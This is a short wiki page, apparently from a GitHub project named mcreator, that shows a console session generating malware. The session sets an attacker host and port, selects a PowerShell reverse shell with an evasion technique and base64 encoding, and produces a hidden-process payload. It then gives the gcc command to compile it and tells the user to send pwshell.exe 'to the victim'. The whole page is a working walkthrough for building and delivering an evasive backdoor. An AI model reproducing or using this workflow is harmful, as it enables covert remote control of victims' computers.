-
Notifications
You must be signed in to change notification settings - Fork 27
An example
Dayanç Soyadlı edited this page Nov 10, 2018
·
2 revisions
python mcreator.py -rsg console
creator > set LHOST 192.168.0.101
LHOST = 192.168.0.101
creator > set LPORT 4444
LPORT = 4444
creator > set reverse_shell powershell
Technique (show techniques) : 1
Technique = strstr
creator > set encode_type base64
show encode_types
creator > run
[+] Hidden Process Base64 Encoded Powershell Reverse Shell generated [+]
[+] How to compile : gcc lib/decode.c lib/pwshell.c -o pwshell [+]
[+] Technique = strstr [+]
[+] After compiling you can send the reverse shell(pwshell.exe) to the victim [+]